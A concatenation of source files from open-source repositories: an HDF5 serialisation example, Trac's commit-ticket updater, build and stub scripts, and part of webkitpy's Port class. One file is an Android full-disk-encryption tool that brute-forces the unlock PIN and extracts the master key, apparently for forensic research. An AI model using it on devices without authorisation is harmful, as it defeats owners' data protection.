@staticmethod
def read(group):
foo, reader = create_reader(Baz, group)
reader.yaml('z')
return foo
class Bar:
def __init__(self):
self.x = np.linspace(0,5,11)
self.y = np.linspace(0,1,11)
self.baz = Baz()
def write(self, group):
writer = Writer(group, self)
writer.arrays('x', 'y')
writer.recurse('baz')
@staticmethod
def read(group):
foo, reader = create_reader(Bar, group)
reader.arrays('x', 'y')
reader.recurse(Baz, 'baz')
return foo
class Foo:
def __init__(self):
self.a = 1.1
self.l = [ [1,5,2], [6,0], [], [1,3,4], [7] ]
self.d = {(1,2): [10,20], (3,4): [30,40]}
self.bar = Bar()
def write(self, group):
writer = Writer(group, self)
writer.scalar('a')
writer.crs('l')
writer.dict('d')
writer.recurse('bar')
@staticmethod
def read(group):
foo, reader = create_reader(Foo, group)
reader.scalar('a')
reader.crs('l')
reader.dict('d')
reader.recurse(Bar, 'bar')
return foo
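# Presumed HDF5 layout produced by Foo.write (an assumption from the writer
# calls above; the checkpoint module's actual naming scheme is not shown here):
# foo.h5 contains 'a' (scalar), 'l' (CRS-encoded list of lists), 'd' (dict),
# 'bar/x' and 'bar/y' (arrays), and 'bar/baz/z' (YAML-serialized dict).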
def main():
foo = Foo()
with h5py.File('foo.h5', 'w') as f:
foo.write(f)
with h5py.File('foo.h5', 'r') as f:
foo_bis = Foo.read(f)
assert foo_bis.a == foo.a
assert foo_bis.l == foo.l
assert foo_bis.d == foo.d
np.testing.assert_array_equal(foo_bis.bar.x, foo.bar.x)
np.testing.assert_array_equal(foo_bis.bar.y, foo.bar.y)
assert foo_bis.bar.baz.z == foo.bar.baz.z
if __name__ == '__main__':
main()
| thni/clash | checkpoint/example/main.py | Python | bsd-3-clause | 1,870 |
# proxy module
from pyface.layered_panel import *
| enthought/etsproxy | enthought/pyface/layered_panel.py | Python | bsd-3-clause | 50 |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2009 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
# This plugin was based on the contrib/trac-post-commit-hook script, which
# had the following copyright notice:
# ----------------------------------------------------------------------------
# Copyright (c) 2004 Stephen Hansen
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
# ----------------------------------------------------------------------------
from __future__ import with_statement
from datetime import datetime
import re
from genshi.builder import tag
from trac.config import BoolOption, Option
from trac.core import Component, implements
from trac.perm import PermissionCache
from trac.resource import Resource
from trac.ticket import Ticket
from trac.ticket.notification import TicketNotifyEmail
from trac.util.datefmt import utc
from trac.util.text import exception_to_unicode
from trac.util.translation import _, cleandoc_
from trac.versioncontrol import IRepositoryChangeListener, RepositoryManager
from trac.versioncontrol.web_ui.changeset import ChangesetModule
from trac.wiki.formatter import format_to_html
from trac.wiki.macros import WikiMacroBase
class CommitTicketUpdater(Component):
"""Update tickets based on commit messages.
This component hooks into changeset notifications and searches commit
messages for text in the form of:
{{{
command #1
command #1, #2
command #1 & #2
command #1 and #2
}}}
Instead of the short-hand syntax "#1", "ticket:1" can be used as well,
e.g.:
{{{
command ticket:1
command ticket:1, ticket:2
command ticket:1 & ticket:2
command ticket:1 and ticket:2
}}}
In addition, the ':' character can be omitted and issue or bug can be used
instead of ticket.
You can have more than one command in a message. The following commands
are supported. There is more than one spelling for each command, to make
this as user-friendly as possible.
close, closed, closes, fix, fixed, fixes::
The specified tickets are closed, and the commit message is added to
them as a comment.
references, refs, addresses, re, see::
The specified tickets are left in their current status, and the commit
message is added to them as a comment.
    A fairly complicated example of what you can do is the following
    commit message:
Changed blah and foo to do this or that. Fixes #10 and #12,
and refs #12.
This will close #10 and #12, and add a note to #12.
"""
implements(IRepositoryChangeListener)
envelope = Option('ticket', 'commit_ticket_update_envelope', '',
"""Require commands to be enclosed in an envelope.
Must be empty or contain two characters. For example, if set to "[]",
then commands must be in the form of [closes #4].""")
commands_close = Option('ticket', 'commit_ticket_update_commands.close',
'close closed closes fix fixed fixes',
"""Commands that close tickets, as a space-separated list.""")
commands_refs = Option('ticket', 'commit_ticket_update_commands.refs',
'addresses re references refs see',
"""Commands that add a reference, as a space-separated list.
If set to the special value <ALL>, all tickets referenced by the
message will get a reference to the changeset.""")
check_perms = BoolOption('ticket', 'commit_ticket_update_check_perms',
'true',
"""Check that the committer has permission to perform the requested
operations on the referenced tickets.
This requires that the user names be the same for Trac and repository
operations.""")
notify = BoolOption('ticket', 'commit_ticket_update_notify', 'true',
"""Send ticket change notification when updating a ticket.""")
ticket_prefix = '(?:#|(?:ticket|issue|bug)[: ]?)'
ticket_reference = ticket_prefix + '[0-9]+'
ticket_command = (r'(?P<action>[A-Za-z]*)\s*.?\s*'
r'(?P<ticket>%s(?:(?:[, &]*|[ ]?and[ ]?)%s)*)' %
(ticket_reference, ticket_reference))
@property
def command_re(self):
(begin, end) = (re.escape(self.envelope[0:1]),
re.escape(self.envelope[1:2]))
return re.compile(begin + self.ticket_command + end)
ticket_re = re.compile(ticket_prefix + '([0-9]+)')
_last_cset_id = None
# IRepositoryChangeListener methods
def changeset_added(self, repos, changeset):
if self._is_duplicate(changeset):
return
tickets = self._parse_message(changeset.message)
comment = self.make_ticket_comment(repos, changeset)
self._update_tickets(tickets, changeset, comment,
datetime.now(utc))
def changeset_modified(self, repos, changeset, old_changeset):
if self._is_duplicate(changeset):
return
tickets = self._parse_message(changeset.message)
old_tickets = {}
if old_changeset is not None:
old_tickets = self._parse_message(old_changeset.message)
tickets = dict(each for each in tickets.iteritems()
if each[0] not in old_tickets)
comment = self.make_ticket_comment(repos, changeset)
self._update_tickets(tickets, changeset, comment,
datetime.now(utc))
def _is_duplicate(self, changeset):
# Avoid duplicate changes with multiple scoped repositories
cset_id = (changeset.rev, changeset.message, changeset.author,
changeset.date)
if cset_id != self._last_cset_id:
self._last_cset_id = cset_id
return False
return True
def _parse_message(self, message):
"""Parse the commit message and return the ticket references."""
cmd_groups = self.command_re.finditer(message)
functions = self._get_functions()
tickets = {}
for m in cmd_groups:
cmd, tkts = m.group('action', 'ticket')
func = functions.get(cmd.lower())
if not func and self.commands_refs.strip() == '<ALL>':
func = self.cmd_refs
if func:
for tkt_id in self.ticket_re.findall(tkts):
tickets.setdefault(int(tkt_id), []).append(func)
return tickets
def make_ticket_comment(self, repos, changeset):
"""Create the ticket comment from the changeset data."""
rev = changeset.rev
revstring = str(rev)
drev = str(repos.display_rev(rev))
if repos.reponame:
revstring += '/' + repos.reponame
drev += '/' + repos.reponame
return """\
In [changeset:"%s" %s]:
{{{
#!CommitTicketReference repository="%s" revision="%s"
%s
}}}""" % (revstring, drev, repos.reponame, rev, changeset.message.strip())
def _update_tickets(self, tickets, changeset, comment, date):
"""Update the tickets with the given comment."""
authname = self._authname(changeset)
perm = PermissionCache(self.env, authname)
for tkt_id, cmds in tickets.iteritems():
try:
self.log.debug("Updating ticket #%d", tkt_id)
save = False
with self.env.db_transaction:
ticket = Ticket(self.env, tkt_id)
ticket_perm = perm(ticket.resource)
for cmd in cmds:
if cmd(ticket, changeset, ticket_perm) is not False:
save = True
if save:
ticket.save_changes(authname, comment, date)
if save:
self._notify(ticket, date)
except Exception, e:
self.log.error("Unexpected error while processing ticket "
"#%s: %s", tkt_id, exception_to_unicode(e))
def _notify(self, ticket, date):
"""Send a ticket update notification."""
if not self.notify:
return
tn = TicketNotifyEmail(self.env)
try:
tn.notify(ticket, newticket=False, modtime=date)
except Exception, e:
self.log.error("Failure sending notification on change to "
"ticket #%s: %s", ticket.id,
exception_to_unicode(e))
def _get_functions(self):
"""Create a mapping from commands to command functions."""
functions = {}
for each in dir(self):
if not each.startswith('cmd_'):
continue
func = getattr(self, each)
for cmd in getattr(self, 'commands_' + each[4:], '').split():
functions[cmd] = func
return functions
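    # With the default options, e.g. 'fix', 'fixes' and 'closes' all map to
    # cmd_close, while 'refs' and 'see' map to cmd_refs.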
def _authname(self, changeset):
return changeset.author.lower() \
if self.env.config.getbool('trac', 'ignore_auth_case') \
else changeset.author
# Command-specific behavior
# The ticket isn't updated if all extracted commands return False.
def cmd_close(self, ticket, changeset, perm):
authname = self._authname(changeset)
        if self.check_perms and 'TICKET_MODIFY' not in perm:
self.log.info("%s doesn't have TICKET_MODIFY permission for #%d",
authname, ticket.id)
return False
ticket['status'] = 'closed'
ticket['resolution'] = 'fixed'
if not ticket['owner']:
ticket['owner'] = authname
def cmd_refs(self, ticket, changeset, perm):
        if self.check_perms and 'TICKET_APPEND' not in perm:
self.log.info("%s doesn't have TICKET_APPEND permission for #%d",
self._authname(changeset), ticket.id)
return False
class CommitTicketReferenceMacro(WikiMacroBase):
_domain = 'messages'
_description = cleandoc_(
"""Insert a changeset message into the output.
This macro must be called using wiki processor syntax as follows:
{{{
{{{
#!CommitTicketReference repository="reponame" revision="rev"
}}}
}}}
where the arguments are the following:
- `repository`: the repository containing the changeset
- `revision`: the revision of the desired changeset
""")
def expand_macro(self, formatter, name, content, args={}):
reponame = args.get('repository') or ''
rev = args.get('revision')
repos = RepositoryManager(self.env).get_repository(reponame)
try:
changeset = repos.get_changeset(rev)
message = changeset.message
rev = changeset.rev
resource = repos.resource
except Exception:
message = content
resource = Resource('repository', reponame)
if formatter.context.resource.realm == 'ticket':
ticket_re = CommitTicketUpdater.ticket_re
if not any(int(tkt_id) == int(formatter.context.resource.id)
for tkt_id in ticket_re.findall(message)):
return tag.p(_("(The changeset message doesn't reference this "
"ticket)"), class_='hint')
if ChangesetModule(self.env).wiki_format_messages:
return tag.div(format_to_html(self.env,
formatter.context.child('changeset', rev, parent=resource),
message, escape_newlines=True), class_='message')
else:
return tag.pre(message, class_='message')
| exocad/exotrac | tracopt/ticket/commit_updater.py | Python | bsd-3-clause | 12,921 |
import shutil
import subprocess as sub
pdf = '_build/latex/gcmstools.pdf'
try:
sub.call(['make', 'latexpdf'])
except Exception:
print("There was an error in latexpdf generation.")
else:
shutil.copy(pdf, '..')
sub.call(['make', 'clean'])
| rnelsonchem/gcmstools | docs/makepdf.py | Python | bsd-3-clause | 246 |
#!/usr/bin/env python
# Authors: Thomas Cannon <[email protected]>
# Seyton Bradford <[email protected]>
# Cedric Halbronn <[email protected]>
# TAGS: Android, Device, Decryption, Crespo, Bruteforce
#
# Parses the header for the encrypted userdata partition
# Decrypts the master key found in the footer using a supplied password
# Bruteforces the pin number using the header
#
# --
# Revision 0.1 (released by Thomas)
# ------------
# Written for Nexus S (crespo) running Android 4.0.4
# Header is located in file userdata_footer on the efs partition
#
# --
# Revision 0.3 (shipped with Santoku Alpha 0.3)
# ------------
# Added support for more than 4-digit PINs
# Speed improvements
#
# --
# Revision 0.4 (released by Cedric)
# ------------
# Adapted to support HTC One running Android 4.2.2
# Header is located in "extra" partition located in mmcblk0p27
# Note: changed name from bruteforce_stdcrypto.py to bruteforce.py
# --
#
import argparse
import itertools
from os import path
from fde import *
def bruteforce_pin(encrypted_partition, encrypted_key, salt, maxdigits):
# load the header data for testing the password
#data = open(headerFile, 'rb').read(32)
#skip: "This is an encrypted device:)"
fd = open(encrypted_partition, 'rb')
fd.read(32)
data = fd.read(32)
fd.close()
print 'Trying to Bruteforce Password... please wait'
    # try all possible PINs with exactly maxdigits digits; return immediately when found
for j in itertools.product(xrange(10),repeat=maxdigits):
# decrypt password
passwdTry = ''.join(str(elem) for elem in j)
#print 'Trying: ' + passwdTry
# -- In case you prefer printing every 100
try:
if (int(passwdTry) % 100) == 0:
print 'Trying passwords from %d to %d' %(int(passwdTry),int(passwdTry)+100)
except:
pass
# make the decryption key from the password
decrypted_key = get_decrypted_key(encrypted_key, salt, passwdTry)
        # try to decrypt the first 32 bytes of the header data (we don't need the iv)
# We do not use the ESSIV as IV generator
# Decrypting with the incorrect IV causes the first block of plaintext to be
# corrupt but subsequent plaintext blocks will be correct.
# http://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Cipher-block_chaining_.28CBC.29
decData = decrypt_data(decrypted_key, "", data)
# has the test worked?
if decData[16:32] == "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0":
return passwdTry, decrypted_key, decData
return None
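# Hedged illustration (not part of the original tool) of the CBC property the
# zero-block check above relies on: decrypting with the wrong IV corrupts only
# the first plaintext block, so the all-zero second block is still testable.
# Assumes PyCrypto's AES, which the fde helpers presumably wrap:
#
# from Crypto.Cipher import AES
# key, iv = '\x11' * 16, '\x22' * 16
# ct = AES.new(key, AES.MODE_CBC, iv).encrypt('A' * 16 + '\x00' * 16)
# pt = AES.new(key, AES.MODE_CBC, '\x00' * 16).decrypt(ct)  # wrong IV
# assert pt[16:32] == '\x00' * 16  # block 2 intact even though block 1 is garbled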
def do_job(header_file, encrypted_partition, outfile, maxpin_digits):
assert path.isfile(header_file), "Header file '%s' not found." % header_file
assert path.isfile(encrypted_partition), "Encrypted partition '%s' not found." % encrypted_partition
# Parse header
encrypted_key, salt = parse_header(header_file)
for n in xrange(4, maxpin_digits+1):
result = bruteforce_pin(encrypted_partition, encrypted_key, salt, n)
if result:
passwdTry, decrypted_key, decData = result
print "Decrypted data:"
hexdump(decData)
print 'Found PIN!: ' + passwdTry
if outfile:
print "Saving decrypted master key to '%s'" % outfile
open(outfile, 'wb').write(decrypted_key)
break
print "Done."
def main():
parser = argparse.ArgumentParser(description='FDE for Android')
parser.add_argument('encrypted_partition', help='The first sector of the encrypted /data partition')
parser.add_argument('header_file', help='The header file containing the encrypted key')
parser.add_argument('-d', '--maxpin_digits', help='max PIN digits. Default is 4', default=4, type=int)
parser.add_argument('-o', '--output_keyfile', help='The filename to save the decrypted master key. Default does not save it', default=None)
args = parser.parse_args()
header_file = args.header_file
encrypted_partition = args.encrypted_partition
outfile = args.output_keyfile
maxpin_digits = args.maxpin_digits
do_job(header_file, encrypted_partition, outfile, maxpin_digits)
if __name__ == "__main__":
main()
| sogeti-esec-lab/android-fde | pydroidfde/bruteforce.py | Python | bsd-3-clause | 4,064 |
# http://matpalm.com/blog/2012/12/27/dead_simple_pymc/
from pylab import * # for close()
import spacepy.plot as spp # for the styles
import numpy as np
import pymc as pm
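# A minimal sketch (an assumption, not taken from the linked post) of the kind
# of dead-simple model the post's title suggests, using the pymc 2.x API
# imported above: infer the mean of normally distributed data.
data = np.random.normal(loc=2.0, scale=1.0, size=100)  # synthetic observations
mu = pm.Uniform('mu', lower=-5.0, upper=5.0)  # flat prior on the unknown mean
obs = pm.Normal('obs', mu=mu, tau=1.0, value=data, observed=True)  # likelihood
model = pm.MCMC([mu, obs])
model.sample(iter=10000, burn=1000)  # posterior samples end up in mu.trace()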
| balarsen/pymc_learning | Learning/simple_normal_model.py | Python | bsd-3-clause | 175 |
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the Google name nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Abstract base class of Port-specific entry points for the layout tests
test infrastructure (the Port and Driver classes)."""
import cgi
import difflib
import errno
import itertools
import json
import logging
import os
import operator
import optparse
import re
import sys
try:
from collections import OrderedDict
except ImportError:
# Needed for Python < 2.7
from webkitpy.thirdparty.ordered_dict import OrderedDict
from webkitpy.common import find_files
from webkitpy.common import read_checksum_from_png
from webkitpy.common.memoized import memoized
from webkitpy.common.system import path
from webkitpy.common.system.executive import ScriptError
from webkitpy.common.system.path import cygpath
from webkitpy.common.system.systemhost import SystemHost
from webkitpy.common.webkit_finder import WebKitFinder
from webkitpy.layout_tests.layout_package.bot_test_expectations import BotTestExpectationsFactory
from webkitpy.layout_tests.models import test_run_results
from webkitpy.layout_tests.models.test_configuration import TestConfiguration
from webkitpy.layout_tests.port import config as port_config
from webkitpy.layout_tests.port import driver
from webkitpy.layout_tests.port import server_process
from webkitpy.layout_tests.port.factory import PortFactory
from webkitpy.layout_tests.servers import apache_http
from webkitpy.layout_tests.servers import pywebsocket
from webkitpy.layout_tests.servers import wptserve
_log = logging.getLogger(__name__)
# FIXME: This class should merge with WebKitPort now that Chromium behaves mostly like other webkit ports.
class Port(object):
"""Abstract class for Port-specific hooks for the layout_test package."""
# Subclasses override this. This should indicate the basic implementation
# part of the port name, e.g., 'mac', 'win', 'gtk'; there is probably (?)
# one unique value per class.
# FIXME: We should probably rename this to something like 'implementation_name'.
port_name = None
# Test names resemble unix relative paths, and use '/' as a directory separator.
TEST_PATH_SEPARATOR = '/'
ALL_BUILD_TYPES = ('debug', 'release')
CONTENT_SHELL_NAME = 'content_shell'
    # True if the port has aac and mp3 codecs built in.
PORT_HAS_AUDIO_CODECS_BUILT_IN = False
ALL_SYSTEMS = (
# FIXME: We treat Retina (High-DPI) devices as if they are running
# a different operating system version. This isn't accurate, but will work until
# we need to test and support baselines across multiple O/S versions.
('retina', 'x86'),
('mac10.9', 'x86'),
('mac10.10', 'x86'),
('mac10.11', 'x86'),
('win7', 'x86'),
('win10', 'x86'),
('precise', 'x86_64'),
('trusty', 'x86_64'),
# FIXME: Technically this should be 'arm', but adding a third architecture type breaks TestConfigurationConverter.
# If we need this to be 'arm' in the future, then we first have to fix TestConfigurationConverter.
('icecreamsandwich', 'x86'),
)
CONFIGURATION_SPECIFIER_MACROS = {
'mac': ['retina', 'mac10.9', 'mac10.10', 'mac10.11'],
'win': ['win7', 'win10'],
'linux': ['precise', 'trusty'],
'android': ['icecreamsandwich'],
}
DEFAULT_BUILD_DIRECTORIES = ('out',)
# overridden in subclasses.
FALLBACK_PATHS = {}
SUPPORTED_VERSIONS = []
# URL to the build requirements page.
BUILD_REQUIREMENTS_URL = ''
@classmethod
def latest_platform_fallback_path(cls):
return cls.FALLBACK_PATHS[cls.SUPPORTED_VERSIONS[-1]]
@classmethod
def _static_build_path(cls, filesystem, build_directory, chromium_base, target, comps):
if build_directory:
return filesystem.join(build_directory, target, *comps)
hits = []
for directory in cls.DEFAULT_BUILD_DIRECTORIES:
base_dir = filesystem.join(chromium_base, directory, target)
path = filesystem.join(base_dir, *comps)
if filesystem.exists(path):
hits.append((filesystem.mtime(path), path))
if hits:
hits.sort(reverse=True)
return hits[0][1] # Return the newest file found.
# We have to default to something, so pick the last one.
return filesystem.join(base_dir, *comps)
@classmethod
def determine_full_port_name(cls, host, options, port_name):
"""Return a fully-specified port name that can be used to construct objects."""
# Subclasses will usually override this.
assert port_name.startswith(cls.port_name)
return port_name
def __init__(self, host, port_name, options=None, **kwargs):
# This value may be different from cls.port_name by having version modifiers
# and other fields appended to it (for example, 'qt-arm' or 'mac-wk2').
self._name = port_name
# These are default values that should be overridden in a subclasses.
self._version = ''
self._architecture = 'x86'
# FIXME: Ideally we'd have a package-wide way to get a
# well-formed options object that had all of the necessary
# options defined on it.
self._options = options or optparse.Values()
self.host = host
self._executive = host.executive
self._filesystem = host.filesystem
self._webkit_finder = WebKitFinder(host.filesystem)
self._config = port_config.Config(self._executive, self._filesystem, self.port_name)
self._helper = None
self._http_server = None
self._websocket_server = None
self._is_wpt_enabled = hasattr(options, 'enable_wptserve') and options.enable_wptserve
self._wpt_server = None
self._image_differ = None
self._server_process_constructor = server_process.ServerProcess # overridable for testing
self._http_lock = None # FIXME: Why does this live on the port object?
self._dump_reader = None
# Python's Popen has a bug that causes any pipes opened to a
# process that can't be executed to be leaked. Since this
# code is specifically designed to tolerate exec failures
# to gracefully handle cases where wdiff is not installed,
# the bug results in a massive file descriptor leak. As a
# workaround, if an exec failure is ever experienced for
# wdiff, assume it's not available. This will leak one
# file descriptor but that's better than leaking each time
# wdiff would be run.
#
# http://mail.python.org/pipermail/python-list/
# 2008-August/505753.html
# http://bugs.python.org/issue3210
self._wdiff_available = None
# FIXME: prettypatch.py knows this path, why is it copied here?
self._pretty_patch_path = self.path_from_webkit_base("Tools", "Scripts", "webkitruby", "PrettyPatch", "prettify.rb")
self._pretty_patch_available = None
if not hasattr(options, 'configuration') or not options.configuration:
self.set_option_default('configuration', self.default_configuration())
if not hasattr(options, 'target') or not options.target:
self.set_option_default('target', self._options.configuration)
self._test_configuration = None
self._reftest_list = {}
self._results_directory = None
self._virtual_test_suites = None
def __str__(self):
return "Port{name=%s, version=%s, architecture=%s, test_configuration=%s}" % (self._name, self._version, self._architecture, self._test_configuration)
def buildbot_archives_baselines(self):
return True
def additional_driver_flag(self):
if self.driver_name() == self.CONTENT_SHELL_NAME:
return ['--run-layout-test']
return []
def supports_per_test_timeout(self):
return False
def default_pixel_tests(self):
return True
def default_smoke_test_only(self):
return False
def default_timeout_ms(self):
timeout_ms = 6 * 1000
if self.get_option('configuration') == 'Debug':
# Debug is usually 2x-3x slower than Release.
return 3 * timeout_ms
return timeout_ms
def driver_stop_timeout(self):
""" Returns the amount of time in seconds to wait before killing the process in driver.stop()."""
# We want to wait for at least 3 seconds, but if we are really slow, we want to be slow on cleanup as
# well (for things like ASAN, Valgrind, etc.)
return 3.0 * float(self.get_option('time_out_ms', '0')) / self.default_timeout_ms()
def wdiff_available(self):
if self._wdiff_available is None:
self._wdiff_available = self.check_wdiff(logging=False)
return self._wdiff_available
def pretty_patch_available(self):
if self._pretty_patch_available is None:
self._pretty_patch_available = self.check_pretty_patch(logging=False)
return self._pretty_patch_available
def default_batch_size(self):
"""Return the default batch size to use for this port."""
if self.get_option('enable_sanitizer'):
# ASAN/MSAN/TSAN use more memory than regular content_shell. Their
# memory usage may also grow over time, up to a certain point.
# Relaunching the driver periodically helps keep it under control.
return 40
        # The default is infinite batch size.
return None
def default_child_processes(self):
"""Return the number of child processes to use for this port."""
return self._executive.cpu_count()
def max_drivers_per_process(self):
"""The maximum number of drivers a child process can use for this port."""
return 2
def default_max_locked_shards(self):
"""Return the number of "locked" shards to run in parallel (like the http tests)."""
max_locked_shards = int(self.default_child_processes()) / 4
if not max_locked_shards:
return 1
return max_locked_shards
def baseline_path(self):
"""Return the absolute path to the directory to store new baselines in for this port."""
# FIXME: remove once all callers are calling either baseline_version_dir() or baseline_platform_dir()
return self.baseline_version_dir()
def baseline_platform_dir(self):
"""Return the absolute path to the default (version-independent) platform-specific results."""
return self._filesystem.join(self.layout_tests_dir(), 'platform', self.port_name)
def baseline_version_dir(self):
"""Return the absolute path to the platform-and-version-specific results."""
baseline_search_paths = self.baseline_search_path()
return baseline_search_paths[0]
def virtual_baseline_search_path(self, test_name):
suite = self.lookup_virtual_suite(test_name)
if not suite:
return None
return [self._filesystem.join(path, suite.name) for path in self.default_baseline_search_path()]
def baseline_search_path(self):
return self.get_option('additional_platform_directory', []) + self._compare_baseline() + self.default_baseline_search_path()
def default_baseline_search_path(self):
"""Return a list of absolute paths to directories to search under for
baselines. The directories are searched in order."""
return map(self._webkit_baseline_path, self.FALLBACK_PATHS[self.version()])
@memoized
def _compare_baseline(self):
factory = PortFactory(self.host)
target_port = self.get_option('compare_port')
if target_port:
return factory.get(target_port).default_baseline_search_path()
return []
def _check_file_exists(self, path_to_file, file_description,
override_step=None, logging=True):
"""Verify the file is present where expected or log an error.
Args:
file_name: The (human friendly) name or description of the file
you're looking for (e.g., "HTTP Server"). Used for error logging.
override_step: An optional string to be logged if the check fails.
logging: Whether or not log the error messages."""
if not self._filesystem.exists(path_to_file):
if logging:
_log.error('Unable to find %s' % file_description)
_log.error(' at %s' % path_to_file)
if override_step:
_log.error(' %s' % override_step)
_log.error('')
return False
return True
def check_build(self, needs_http, printer):
result = True
dump_render_tree_binary_path = self._path_to_driver()
result = self._check_file_exists(dump_render_tree_binary_path,
'test driver') and result
if not result and self.get_option('build'):
result = self._check_driver_build_up_to_date(
self.get_option('configuration'))
else:
_log.error('')
helper_path = self._path_to_helper()
if helper_path:
result = self._check_file_exists(helper_path,
'layout test helper') and result
if self.get_option('pixel_tests'):
result = self.check_image_diff(
'To override, invoke with --no-pixel-tests') and result
# It's okay if pretty patch and wdiff aren't available, but we will at least log messages.
self._pretty_patch_available = self.check_pretty_patch()
self._wdiff_available = self.check_wdiff()
if self._dump_reader:
result = self._dump_reader.check_is_functional() and result
if needs_http:
result = self.check_httpd() and result
return test_run_results.OK_EXIT_STATUS if result else test_run_results.UNEXPECTED_ERROR_EXIT_STATUS
def _check_driver(self):
driver_path = self._path_to_driver()
if not self._filesystem.exists(driver_path):
_log.error("%s was not found at %s" % (self.driver_name(), driver_path))
return False
return True
def _check_port_build(self):
# Ports can override this method to do additional checks.
return True
def check_sys_deps(self, needs_http):
"""If the port needs to do some runtime checks to ensure that the
tests can be run successfully, it should override this routine.
This step can be skipped with --nocheck-sys-deps.
Returns whether the system is properly configured."""
cmd = [self._path_to_driver(), '--check-layout-test-sys-deps']
local_error = ScriptError()
def error_handler(script_error):
local_error.exit_code = script_error.exit_code
output = self._executive.run_command(cmd, error_handler=error_handler)
if local_error.exit_code:
_log.error('System dependencies check failed.')
_log.error('To override, invoke with --nocheck-sys-deps')
_log.error('')
_log.error(output)
            if self.BUILD_REQUIREMENTS_URL != '':
_log.error('')
_log.error('For complete build requirements, please see:')
_log.error(self.BUILD_REQUIREMENTS_URL)
return test_run_results.SYS_DEPS_EXIT_STATUS
return test_run_results.OK_EXIT_STATUS
def check_image_diff(self, override_step=None, logging=True):
"""This routine is used to check whether image_diff binary exists."""
image_diff_path = self._path_to_image_diff()
if not self._filesystem.exists(image_diff_path):
_log.error("image_diff was not found at %s" % image_diff_path)
return False
return True
def check_pretty_patch(self, logging=True):
"""Checks whether we can use the PrettyPatch ruby script."""
try:
_ = self._executive.run_command(['ruby', '--version'])
except OSError, e:
if e.errno in [errno.ENOENT, errno.EACCES, errno.ECHILD]:
if logging:
_log.warning("Ruby is not installed; can't generate pretty patches.")
_log.warning('')
return False
if not self._filesystem.exists(self._pretty_patch_path):
if logging:
_log.warning("Unable to find %s; can't generate pretty patches." % self._pretty_patch_path)
_log.warning('')
return False
return True
def check_wdiff(self, logging=True):
if not self._path_to_wdiff():
# Don't need to log here since this is the port choosing not to use wdiff.
return False
try:
_ = self._executive.run_command([self._path_to_wdiff(), '--help'])
except OSError:
if logging:
message = self._wdiff_missing_message()
if message:
for line in message.splitlines():
_log.warning(' ' + line)
_log.warning('')
return False
return True
def _wdiff_missing_message(self):
return 'wdiff is not installed; please install it to generate word-by-word diffs.'
def check_httpd(self):
httpd_path = self.path_to_apache()
if httpd_path:
try:
server_name = self._filesystem.basename(httpd_path)
env = self.setup_environ_for_server(server_name)
if self._executive.run_command([httpd_path, "-v"], env=env, return_exit_code=True) != 0:
_log.error("httpd seems broken. Cannot run http tests.")
return False
return True
except OSError:
pass
_log.error("No httpd found. Cannot run http tests.")
return False
def do_text_results_differ(self, expected_text, actual_text):
return expected_text != actual_text
def do_audio_results_differ(self, expected_audio, actual_audio):
return expected_audio != actual_audio
def diff_image(self, expected_contents, actual_contents):
"""Compare two images and return a tuple of an image diff, and an error string.
        If an error occurs (like image_diff isn't found, or crashes), we log an error and return an error string.
"""
# If only one of them exists, return that one.
if not actual_contents and not expected_contents:
return (None, None)
if not actual_contents:
return (expected_contents, None)
if not expected_contents:
return (actual_contents, None)
tempdir = self._filesystem.mkdtemp()
expected_filename = self._filesystem.join(str(tempdir), "expected.png")
self._filesystem.write_binary_file(expected_filename, expected_contents)
actual_filename = self._filesystem.join(str(tempdir), "actual.png")
self._filesystem.write_binary_file(actual_filename, actual_contents)
diff_filename = self._filesystem.join(str(tempdir), "diff.png")
# image_diff needs native win paths as arguments, so we need to convert them if running under cygwin.
native_expected_filename = self._convert_path(expected_filename)
